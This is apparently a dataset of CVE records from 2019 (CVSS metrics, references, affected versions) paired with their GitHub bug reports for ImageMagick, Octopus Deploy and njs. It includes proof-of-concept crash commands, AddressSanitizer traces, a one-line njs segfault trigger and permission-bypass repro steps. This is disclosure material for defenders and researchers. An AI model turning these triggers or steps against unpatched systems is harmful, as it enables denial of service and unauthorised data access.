"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00043.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108102"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1555"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00015.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4034-1/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16:*:*:*:*:*:*",
"matchCriteriaId": "2EDF50C4-9FFE-4EBF-A5BE-44AF7E6988D9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1555 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [X] I have written a descriptive issue title
- [X] I have verified that I am using the latest version of ImageMagick
- [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a heap buffer overflow vulnerability in function WriteTIFFImage of coders/tiff.c.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
[poc](https://drive.google.com/open?id=1VPmM34DHDhFYJCMKvRYIAH4iT14hVsOE)
magick convert $poc /dev/null
`=================================================================`
`==2369==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ab14 at pc 0x7f24afc30935 bp 0x7ffe0bdcba20 sp 0x7ffe0bdcb1c8`
`READ of size 131072 at 0x60200000ab14 thread T0`
` #0 0x7f24afc30934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)`
` #1 0x7f24af23823a (/usr/lib/x86_64-linux-gnu/libtiff.so.5+0x1823a)`
` #2 0x7a3fed in WriteTIFFImage coders/tiff.c:4314`
` #3 0x848ecb in WriteImage MagickCore/constitute.c:1159`
` #4 0x849bf0 in WriteImages MagickCore/constitute.c:1376`
` #5 0xbf1565 in ConvertImageCommand MagickWand/convert.c:3305`
` #6 0xcdf015 in MagickCommandGenesis MagickWand/mogrify.c:185`
` #7 0x4100a1 in MagickMain utilities/magick.c:149`
` #8 0x410282 in main utilities/magick.c:180`
` #9 0x7f24ab49d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)`
` #10 0x40fbb8 in _start (/home/ImageMagick/utilities/magick+0x40fbb8)`
``
`0x60200000ab14 is located 0 bytes to the right of 4-byte region [0x60200000ab10,0x60200000ab14)`
`allocated by thread T0 here:`
` #0 0x7f24afc3c602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)`
` #1 0x7f24af2293d4 (/usr/lib/x86_64-linux-gnu/libtiff.so.5+0x93d4)`
``
`SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy`
`Shadow bytes around the buggy address:`
` 0x0c047fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa`
` 0x0c047fff9520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa`
` 0x0c047fff9530: fa fa fa fa fa fa fa fa fa fa fd fa fa fa fd fa`
` 0x0c047fff9540: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fa`
` 0x0c047fff9550: fa fa fd fa fa fa fd fa fa fa 04 fa fa fa 04 fa`
`=>0x0c047fff9560: fa fa[04]fa fa fa 00 fa fa fa fd fd fa fa fd fd`
` 0x0c047fff9570: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa fd fa`
` 0x0c047fff9580: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa fd fd`
` 0x0c047fff9590: fa fa 00 04 fa fa 00 04 fa fa 00 04 fa fa 00 04`
` 0x0c047fff95a0: fa fa 00 04 fa fa 00 04 fa fa 00 07 fa fa 03 fa`
` 0x0c047fff95b0: fa fa 00 03 fa fa 00 04 fa fa fd fd fa fa fd fd`
`Shadow byte legend (one shadow byte represents 8 application bytes):`
` Addressable: 00`
` Partially addressable: 01 02 03 04 05 06 07 `
` Heap left redzone: fa`
` Heap right redzone: fb`
` Freed heap region: fd`
` Stack left redzone: f1`
` Stack mid redzone: f2`
` Stack right redzone: f3`
` Stack partial redzone: f4`
` Stack after return: f5`
` Stack use after scope: f8`
` Global redzone: f9`
` Global init order: f6`
` Poisoned by user: f7`
` Container overflow: fc`
` Array cookie: ac`
` Intra object redzone: bb`
` ASan internal: fe`
`==2369==ABORTING`
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
`Version: ImageMagick 7.0.8-43 Q16 x86_64 2019-04-27 https://imagemagick.org`
`Copyright: ? 1999-2019 ImageMagick Studio LLC`
`License: https://imagemagick.org/script/license.php`
`Features: Cipher DPC HDRI OpenMP(4.0) `
`Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib`
- Environment (Operating system, version and so on):
`Distributor ID: Ubuntu`
`Description: Ubuntu 16.04.1 LTS`
`Release: 16.04`
`Codename: xenial`
- Additional information:
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap_buffer_overflow in WriteTIFFImage of coders/tiff.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1555/comments | 2 | 2019-04-27T13:08:13Z | 2019-05-04T14:21:50Z | https://github.com/ImageMagick/ImageMagick/issues/1555 | 437,941,914 | 1,555 |
CVE-2019-11598 | 2019-04-29T16:29:00.470 | In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108102"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1540"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00015.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4034-1/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-40:q16:*:*:*:*:*:*",
"matchCriteriaId": "389645FC-93EE-430B-AFAB-108570F3857D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1540 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [X] I have written a descriptive issue title
- [X] I have verified that I am using the latest version of ImageMagick
- [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a heap buffer overflow vulnerability in function WritePNMImage of coders/pnm.c.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
[poc](https://drive.google.com/open?id=14WjaSf3CMM-h6HnuQ1xufVGkC_swvJma)
magick convert $poc ./test.pnm
`=================================================================`
`==16178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b6f0 at pc 0x0000009f987d bp 0x7fff206e34b0 sp 0x7fff206e34a0`
`READ of size 8 at 0x60200000b6f0 thread T0`
`==16178==AddressSanitizer: while reporting a bug found another one. Ignoring.`
` #0 0x9f987c in SetGrayscaleImage._omp_fn.4 MagickCore/quantize.c:3453`
` #1 0x7f12195becbe in GOMP_parallel (/usr/lib/x86_64-linux-gnu/libgomp.so.1+0xbcbe)`
` #2 0x9f676d in SetGrayscaleImage MagickCore/quantize.c:3432`
` #3 0x9f3ee7 in QuantizeImage MagickCore/quantize.c:2677`
` #4 0x7cf518 in SetImageType MagickCore/attribute.c:1364`
` #5 0x6766a7 in WritePNMImage coders/pnm.c:1938`
` #6 0x8485ba in WriteImage MagickCore/constitute.c:1159`
` #7 0x8492df in WriteImages MagickCore/constitute.c:1376`
` #8 0xbf05a1 in ConvertImageCommand MagickWand/convert.c:3305`
` #9 0xcdc6f2 in MagickCommandGenesis MagickWand/mogrify.c:184`
` #10 0x410091 in MagickMain utilities/magick.c:149`
` #11 0x410272 in main utilities/magick.c:180`
` #12 0x7f1218cea82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)`
` #13 0x40fba8 in _start (/home/ImageMagick/utilities/magick+0x40fba8)`
``
`0x60200000b6f4 is located 0 bytes to the right of 4-byte region [0x60200000b6f0,0x60200000b6f4)`
`allocated by thread T0 here:`
` #0 0x7f121d489602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)`
` #1 0x4408a5 in AcquireMagickMemory MagickCore/memory.c:478`
` #2 0x4408f9 in AcquireQuantumMemory MagickCore/memory.c:551`
` #3 0x4c3f69 in ConstantString MagickCore/string.c:713`
` #4 0x43d3e0 in AcquireMagickInfo MagickCore/magick.c:193`
` #5 0x6747aa in RegisterPNMImage coders/pnm.c:1456`
` #6 0x49fc1d in RegisterStaticModule MagickCore/static.c:257`
` #7 0x43df66 in GetMagickInfo MagickCore/magick.c:642`
` #8 0x42164a in SetImageInfo MagickCore/image.c:2855`
` #9 0x849087 in WriteImages MagickCore/constitute.c:1336`
` #10 0xbf05a1 in ConvertImageCommand MagickWand/convert.c:3305`
` #11 0xcdc6f2 in MagickCommandGenesis MagickWand/mogrify.c:184`
` #12 0x410091 in MagickMain utilities/magick.c:149`
` #13 0x410272 in main utilities/magick.c:180`
` #14 0x7f1218cea82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)`
``
`SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/quantize.c:3453 SetGrayscaleImage._omp_fn.4`
`Shadow bytes around the buggy address:`
` 0x0c047fff9680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa`
` 0x0c047fff9690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa`
` 0x0c047fff96a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa`
` 0x0c047fff96b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa`
` 0x0c047fff96c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa`
`=>0x0c047fff96d0: fa fa fa fa fa fa 00 00 fa fa 04 fa fa fa[04]fa`
` 0x0c047fff96e0: fa fa 00 00 fa fa 04 fa fa fa 04 fa fa fa 04 fa`
` 0x0c047fff96f0: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 04 fa`
` 0x0c047fff9700: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 00 04`
` 0x0c047fff9710: fa fa 00 04 fa fa 00 04 fa fa 00 04 fa fa 00 04`
` 0x0c047fff9720: fa fa 00 04 fa fa 00 04 fa fa 00 04 fa fa 00 04`
`Shadow byte legend (one shadow byte represents 8 application bytes):`
` Addressable: 00`
` Partially addressable: 01 02 03 04 05 06 07 `
` Heap left redzone: fa`
` Heap right redzone: fb`
` Freed heap region: fd`
` Stack left redzone: f1`
` Stack mid redzone: f2`
` Stack right redzone: f3`
` Stack partial redzone: f4`
` Stack after return: f5`
` Stack use after scope: f8`
` Global redzone: f9`
` Global init order: f6`
` Poisoned by user: f7`
` Container overflow: fc`
` Array cookie: ac`
` Intra object redzone: bb`
` ASan internal: fe`
`==16178==ABORTING`
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
```
Version: ImageMagick 7.0.8-40 Q16 x86_64 2019-04-08 https://imagemagick.org
Copyright: ? 1999-2019 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP
Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib
```
- Environment (Operating system, version and so on):
```
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
```
- Additional information:
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow in WritePNMImage of coders/pnm.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1540/comments | 6 | 2019-04-08T03:10:13Z | 2019-05-12T11:30:48Z | https://github.com/ImageMagick/ImageMagick/issues/1540 | 430,236,223 | 1,540 |
CVE-2019-11632 | 2019-05-01T14:29:00.483 | In Octopus Deploy 2019.1.0 through 2019.3.1 and 2019.4.0 through 2019.4.5, an authenticated user with the VariableViewUnscoped or VariableEditUnscoped permission scoped to a specific project could view or edit unscoped variables from a different project. (These permissions are only used in custom User Roles and do not affect built in User Roles.) | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/5528"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/5529"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEF5B5BF-E265-46DC-A509-3DC3B426D817",
"versionEndExcluding": null,
"versionEndIncluding": "2019.3.1",
"versionStartExcluding": null,
"versionStartIncluding": "2019.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:octopus:octopus_server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845C89E5-F87B-43F1-9639-40CB0AF7D9A6",
"versionEndExcluding": null,
"versionEndIncluding": "2019.4.5",
"versionStartExcluding": null,
"versionStartIncluding": "2019.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/OctopusDeploy/Issues/issues/5528 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | # Prerequisites
- [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process](https://octopushq.atlassian.net/wiki/spaces/IN/pages/2430143/Security+Disclosure+Policy).
- [x] I have raised a CVE according to our [CVE process] (https://octopushq.atlassian.net/wiki/spaces/IN/pages/8290305/Requesting+a+CVE+ID)
- [x] I have written a descriptive issue title
- [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?)
## Description
The `VariableViewUnscoped` and `VariableEditUnscoped` permissions can be scoped to projects. As part of the permissions redesign we did during the spaces project, this behavior was lost, which means these permissions can no longer be scoped to projects. Granting a user these permissions gives them access to unscoped variables in _all_ projects, regardless of how this permission has been scoped.
### Repro steps
1. Create a project (eg OctoFX) with some variables that are unscoped, and some variables that are scoped to an environment (eg Development)
![image](https://user-images.githubusercontent.com/1892715/56783712-71e40a80-6830-11e9-9d52-ccc58dfdf94c.png)
2. Create another unrelated project (eg Foo)
3. Configure a separate user that has the following permissions
- The "Project Contributor" role scoped to [OctoFX, Development]
- `VariableViewUnscoped` scoped to [Foo]
4. As that user, try to view the variables for the project OctoFX
### Expected result
This user should not be able to view the Unscoped variable within OctoFX, because their `VariableViewUnscoped` permissions was not scoped to the OctoFX project.
### Actual result
This user is able to see the unscoped variables from the project OctoFX, regardless of how their `VariableViewUnscoped` permission has been scoped.
## Screenshots
### In 2018.10.6 (working)
With this permissions setup
![image](https://user-images.githubusercontent.com/1892715/56783884-372ea200-6831-11e9-886d-35a93881aa99.png)
You can only view the one variable in OctoFX
![image](https://user-images.githubusercontent.com/1892715/56783842-123a2f00-6831-11e9-9709-f87599a716e5.png)
### In 2019.4.4 (failing)
With this permissions setup
![image](https://user-images.githubusercontent.com/1892715/56783965-9f7d8380-6831-11e9-80dd-d106e22a015b.png)
You can view all unscoped variables in OctoFX
![image](https://user-images.githubusercontent.com/1892715/56783958-942a5800-6831-11e9-90e9-30db250b8a26.png)
## Details
These affected permissions are not used by an built in roles in Octopus. If you are using built in roles only, then you will not be affected.
## Affected versions of Octopus Server
`2019.1.0` - `2019.3.1` (inclusive), and `2019.4.0` - `2019.4.5` (inclusive)
## Workarounds
There is no known way of preserving the same access control that existed before this regression was introduced.
Until an upgrade can be performed to a version of Octopus Server where this bug has been fixed, It is recommended that the `VariableViewUnscoped` and `VariableEditUnscoped` permissions are revoked where possible and only highly privileged users (eg. admins or space managers) are granted these permissions.
| Variable[View/Edit]Unscoped permissions don't comply with project scoping (CVE-2019-11632) | https://api.github.com/repos/OctopusDeploy/Issues/issues/5528/comments | 3 | 2019-05-01T05:11:04Z | 2019-07-31T08:42:24Z | https://github.com/OctopusDeploy/Issues/issues/5528 | 439,070,509 | 5,528 |
CVE-2019-11632 | 2019-05-01T14:29:00.483 | In Octopus Deploy 2019.1.0 through 2019.3.1 and 2019.4.0 through 2019.4.5, an authenticated user with the VariableViewUnscoped or VariableEditUnscoped permission scoped to a specific project could view or edit unscoped variables from a different project. (These permissions are only used in custom User Roles and do not affect built in User Roles.) | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/5528"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/5529"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEF5B5BF-E265-46DC-A509-3DC3B426D817",
"versionEndExcluding": null,
"versionEndIncluding": "2019.3.1",
"versionStartExcluding": null,
"versionStartIncluding": "2019.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:octopus:octopus_server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845C89E5-F87B-43F1-9639-40CB0AF7D9A6",
"versionEndExcluding": null,
"versionEndIncluding": "2019.4.5",
"versionStartExcluding": null,
"versionStartIncluding": "2019.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/OctopusDeploy/Issues/issues/5529 | [
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | This bug represents [this issue](https://github.com/OctopusDeploy/Issues/issues/5528) in LTS 2019.3 | Variable[View/Edit]Unscoped permissions don't comply with project scoping (CVE-2019-11632) | https://api.github.com/repos/OctopusDeploy/Issues/issues/5529/comments | 3 | 2019-05-01T05:15:06Z | 2019-07-31T08:42:27Z | https://github.com/OctopusDeploy/Issues/issues/5529 | 439,071,058 | 5,529 |
CVE-2019-11837 | 2019-05-09T14:29:00.510 | njs through 0.3.1, used in NGINX, has a segmentation fault in String.prototype.toBytes for negative arguments, related to nxt_utf8_next in nxt/nxt_utf8.h and njs_string_offset in njs/njs_string.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/155"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/155 | [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ```js
>> "A".repeat(38).toBytes(-5)
ASAN:SIGSEGV
=================================================================
==16054==ERROR: AddressSanitizer: SEGV on unknown address 0x6090000168e0 (pc 0x00000042c455 bp 0x7fffa72fbb30 sp 0x7fffa72fbaf0 T0)
#0 0x42c454 in nxt_utf8_next nxt/nxt_utf8.h:44
#1 0x42c454 in njs_string_offset njs/njs_string.c:2058
#2 0x4282cd in njs_string_prototype_to_bytes njs/njs_string.c:1047
#3 0x45f1f2 in njs_function_native_call njs/njs_function.c:587
#4 0x41bd8f in njs_vmcode_function_call njs/njs_vm.c:2061
#5 0x413d10 in njs_vmcode_interpreter njs/njs_vm.c:159
#6 0x412be5 in njs_vm_start njs/njs.c:594
#7 0x4049a7 in njs_process_script njs/njs_shell.c:770
#8 0x4037ad in njs_interactive_shell njs/njs_shell.c:500
#9 0x402a03 in main njs/njs_shell.c:270
```
Minified test from [fluff](https://github.com/Samsung/Fluff) report. | Segfault in String.prototype.toBytes() for negative arguments. | https://api.github.com/repos/nginx/njs/issues/155/comments | 0 | 2019-05-07T18:38:36Z | 2019-05-31T12:13:12Z | https://github.com/nginx/njs/issues/155 | 441,389,038 | 155 |
CVE-2019-11838 | 2019-05-09T14:29:00.557 | njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in Array.prototype.splice after a resize, related to njs_array_prototype_splice in njs/njs_array.c, because of njs_array_expand size mishandling. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/153"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/153 | [
"Issue Tracking",
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ```js
var v0=[]
var x = new Array(10)
var i = 0
while (i < 100) {
